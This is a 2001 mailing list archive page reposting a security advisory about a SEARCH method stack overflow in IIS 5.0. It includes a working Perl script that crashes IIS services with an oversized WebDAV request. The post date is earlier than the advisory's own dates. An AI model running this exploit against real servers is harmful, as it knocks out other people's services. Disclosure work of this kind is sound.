|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Steve (steve
SECURESOLUTIONS.ORG)Date: Sat Feb 17 2001 - 01:42:15 CST
More short notice stuff from Georgi.
---------------------------------------------------------------------------
Georgi Guninski security advisory #39, 2001
IIS 5.0 SEARCH method overflow
Systems affected:
IIS 5.0
Risk: Unknown, may be very serious
Date: 16 March 2001
Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it
unmodified.
You may not modify it and distribute it or distribute parts of it without
the author's
written permission.
Disclaimer:
The opinions expressed in this advisory and program are my own and not of
any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this
advisory or program or
any derivatives thereof.
Description:
This may be a duplicate of my advisory #38 -
http://www.guninski.com/iispropover.html
sorry if this is the case.
Microsoft did not answer my question whether it is the same issue.
By sending valid (not malformed :) ) but long SEARCH request to IIS 5.0 it
is possible to
restart all IIS related services.
The interesting point is the stack seems to be smashed and I believe this
may lead
to executing arbitrary code though I have not achieved it.
Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = ARGV[1];
$host = ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto =>
"TCP") || return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT
DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------
Workaround: some of the revisions of MS01-16 solves this issue, yet I do not
recommend using IIS in production environment.
Vendor status:
Microsoft was informed on 11 March 2001
Regards,
Georgi Guninski
http://www.guninski.com
----------------------
You may visit Guninski Security Mailing List page at
http://www.guninski.com/mailinglist.html
----------------------
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]